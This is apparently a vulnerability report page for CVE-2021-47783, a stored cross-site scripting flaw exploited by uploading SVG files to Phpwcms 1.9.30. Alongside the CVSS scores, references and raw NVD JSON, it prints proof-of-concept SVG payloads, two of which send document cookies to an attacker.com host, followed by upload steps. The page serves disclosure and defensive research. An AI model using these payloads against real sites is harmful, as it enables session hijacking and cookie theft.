Security Vulnerability Report
CVE-2021-47783 CVSS 5.4 MEDIUM

CVE-2021-47783

Published: 2026-01-16 00:16:22
Last Modified: 2026-02-09 14:52:36

Description

Phpwcms 1.9.30 contains a file upload vulnerability that allows authenticated attackers to upload malicious SVG files with embedded JavaScript. Attackers can upload crafted SVG payloads through the multiple file upload feature to potentially execute cross-site scripting attacks on the platform.

CVSS Details

CVSS Score: 5.4
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:phpwcms:phpwcms:1.9.30:*:*:*:*:*:*:* - VULNERABLE
Phpwcms 1.9.30

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
xml
<!-- Malicious SVG file for CVE-2021-47783 -->
<!-- This PoC demonstrates the XSS vulnerability in Phpwcms file upload -->

<!-- Basic XSS PoC -->
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.cookie)">
  <rect width="100" height="100" fill="red"/>
</svg>

<!-- Cookie Stealing PoC -->
<!--
<svg xmlns="http://www.w3.org/2000/svg">
  <script>
    <![CDATA[
    fetch('https://attacker.com/steal?cookie=' + encodeURIComponent(document.cookie));
    ]]>
  </script>
</svg>
-->

<!-- Session Hijacking PoC -->
<!--
<svg xmlns="http://www.w3.org/2000/svg">
  <foreignObject width="100" height="100">
    <div xmlns="http://www.w3.org/1999/xhtml">
      <script>
        document.location='https://attacker.com/hijack?session='+document.cookie;
      </script>
    </div>
  </foreignObject>
</svg>
-->

<!-- Upload Instructions:
1. Login to Phpwcms with valid credentials
2. Navigate to file upload functionality (multiple file upload feature)
3. Upload this SVG file
4. When victim views the uploaded SVG, XSS payload executes
-->

References

http://www.phpwcms.org/ (Product)
https://www.exploit-db.com/exploits/50363 (Exploit, VDB Entry)
https://www.vulncheck.com/advisories/phpwcms-arbitrary-file-upload (Third Party Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2021-47783",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-16T00:16:21.503",
    "lastModified": "2026-02-09T14:52:36.330",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Phpwcms 1.9.30 contains a file upload vulnerability that allows authenticated attackers to upload malicious SVG files with embedded JavaScript. Attackers can upload crafted SVG payloads through the multiple file upload feature to potentially execute cross-site scripting attacks on the platform."
      },
      {
        "lang": "es",
        "value": "Phpwcms 1.9.30 contiene una vulnerabilidad de carga de archivos que permite a atacantes autenticados cargar archivos SVG maliciosos con JavaScript incrustado. Los atacantes pueden cargar cargas útiles SVG manipuladas a través de la función de carga de múltiples archivos para ejecutar potencialmente ataques de cross-site scripting en la plataforma."
      }
    ],
    "metrics": {
      "cvssMetricV40": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "4.0",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "vulnConfidentialityImpact": "LOW",
            "vulnIntegrityImpact": "LOW",
            "vulnAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "subAvailabilityImpact": "NONE",
            "exploitMaturity": "NOT_DEFINED",
            "confidentialityRequirement": "NOT_DEFINED",
            "integrityRequirement": "NOT_DEFINED",
            "availabilityRequirement": "NOT_DEFINED",
            "modifiedAttackVector": "NOT_DEFINED",
            "modifiedAttackComplexity": "NOT_DEFINED",
            "modifiedAttackRequirements": "NOT_DEFINED",
            "modifiedPrivilegesRequired": "NOT_DEFINED",
            "modifiedUserInteraction": "NOT_DEFINED",
            "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
            "modifiedVulnIntegrityImpact": "NOT_DEFINED",
            "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
            "modifiedSubConfidentialityImpact": "NOT_DEFINED",
            "modifiedSubIntegrityImpact": "NOT_DEFINED",
            "modifiedSubAvailabilityImpact": "NOT_DEFINED",
            "Safety": "NOT_DEFINED",
            "Automatable": "NOT_DEFINED",
            "Recovery": "NOT_DEFINED",
            "valueDensity": "NOT_DEFINED",
            "vulnerabilityResponseEffort": "NOT_DEFINED",
            "providerUrgency": "NOT_DEFINED"
          }
        }
      ],
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
            "baseScore": 5.4,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.3,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [{"lang": "en", "value": "CWE-434"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:phpwcms:phpwcms:1.9.30:*:*:*:*:*:*:*",
                "matchCriteriaId": "4FC001B8-FE0C-47C7-BA0E-36A0FFE00285"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {"url": "http://www.phpwcms.org/", "source": "[email protected]", "tags": ["Product"]},
      {"url": "https://www.exploit-db.com/exploits/50363", "source": "[email protected]", "tags": ["Exploit", "VDB Entry"]},
      {"url": "https://www.vulncheck.com/advisories/phpwcms-arbitrary-file-upload", "source": "[email protected]", "tags": ["Third Party Advisory"]},
      {"url": "https://www.exploit-db.com/exploits/50363", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "VDB Entry"]}
    ]
  }
}